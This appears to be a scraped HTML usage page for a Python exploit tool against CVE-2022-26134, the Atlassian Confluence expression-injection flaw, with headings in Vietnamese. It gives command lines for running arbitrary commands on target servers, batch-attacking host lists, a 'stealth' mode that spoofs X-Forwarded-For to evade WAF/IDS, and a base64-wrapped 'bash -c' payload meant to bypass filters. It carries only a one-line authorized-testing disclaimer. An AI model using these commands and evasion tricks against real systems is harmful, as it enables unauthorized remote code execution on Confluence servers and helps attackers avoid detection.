Exploit for Expression Language Injection in Atlassian Confluence_Data_Center CVE-2022-26134

## https://sploitus.com/exploit?id=A31ACFB8-97BB-5D62-B1BA-D8B1DFDF84A0
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>ELAINA CORE Exploit Tool - CVE-2022-26134</title>
  <style>
    body {
      font-family: "Segoe UI", sans-serif;
      background: #0e0e0e;
      color: #d0d0d0;
      padding: 2em;
      line-height: 1.6;
    }
    h1, h2 {
      color: #f26b6b;
    }
    code {
      background: #222;
      color: #8df4ff;
      padding: 0.2em 0.4em;
      border-radius: 4px;
    }
    pre {
      background: #1a1a1a;
      padding: 1em;
      border-left: 4px solid #f26b6b;
      overflow-x: auto;
    }
    .section {
      margin-bottom: 2em;
    }
    .footer {
      font-size: 0.9em;
      margin-top: 3em;
      border-top: 1px solid #444;
      padding-top: 1em;
      color: #888;
    }
    a {
      color: #7ddfff;
    }
  </style>
</head>
<body>

  <h1>🛡️ ELAINA CORE Exploit Tool</h1>
  <h2>CVE-2022-26134 - Red Team Pro Version</h2>

  <p><strong>Coder:</strong> <a href="https://github.com/Yuri08loveElaina" target="_blank">Yuri08</a></p>
  <p><strong>Website:</strong> <a href="https://yuri08loveelaina.github.io" target="_blank">yuri08loveelaina.github.io</a></p>
  <p><strong>Warning:</strong> For authorized security testing only.</p>

  <div class="section">
    <h2>🚀 Cách sử dụng cơ bản</h2>
    <pre><code>python3 exploit26134_pro.py --url https://target.com --cmd "id"</code></pre>
  </div>

  <div class="section">
    <h2>🔍 Kiểm tra phiên bản (check-only)</h2>
    <pre><code>python3 exploit26134_pro.py --url https://target.com --check-only</code></pre>
  </div>

  <div class="section">
    <h2>📂 Quét nhiều mục tiêu (batch scan)</h2>
    <pre><code>python3 exploit26134_pro.py --file targets.txt --cmd "whoami"</code></pre>
    <p><strong>File <code>targets.txt</code> ví dụ:</strong></p>
    <pre><code>https://target1.com
http://target2.com</code></pre>
  </div>

  <div class="section">
    <h2>🕵️‍♂️ Chế độ stealth (ẩn mình)</h2>
    <pre><code>python3 exploit26134_pro.py --url https://target.com --cmd "whoami" --stealth</code></pre>
    <ul>
      <li>Payload được gửi qua POST</li>
      <li>Thêm header <code>X-Forwarded-For</code> để tránh WAF/IDS</li>
    </ul>
  </div>

  <div class="section">
    <h2>🔐 Proxy Support (Burp / ZAP)</h2>
    <pre><code>python3 exploit26134_pro.py --url https://target.com --cmd "ls" --proxy http://127.0.0.1:8080</code></pre>
  </div>

  <div class="section">
    <h2>📤 Xuất kết quả JSON</h2>
    <pre><code>python3 exploit26134_pro.py --url https://target.com --cmd "id" --json-output result.json</code></pre>
  </div>

  <div class="section">
    <h2>🧬 Payload Bypass bằng Base64</h2>
    <pre><code>python3 exploit26134_pro.py --url https://target.com --cmd "ls -la" --base64</code></pre>
    <p>Lệnh sẽ được encode và thực thi như sau: <code>bash -c "$(echo Y21kCg== | base64 -d)"</code></p>
  </div>

  <div class="section">
    <h2>✅ Tính năng nổi bật</h2>
    <ul>
      <li>✔️ Batch scan nhiều host</li>
      <li>✔️ Stealth mode tránh WAF</li>
      <li>✔️ Check version & verify</li>
      <li>✔️ Hỗ trợ proxy</li>
      <li>✔️ JSON export</li>
      <li>✔️ Base64 payload bypass</li>
    </ul>
  </div>

  <div class="footer">
    <p>© 2025 - Developed with ❤️ by Yuri08 | <a href="https://github.com/Yuri08loveElaina" target="_blank">github.com/Yuri08loveElaina</a></p>
  </div>

</body>
</html>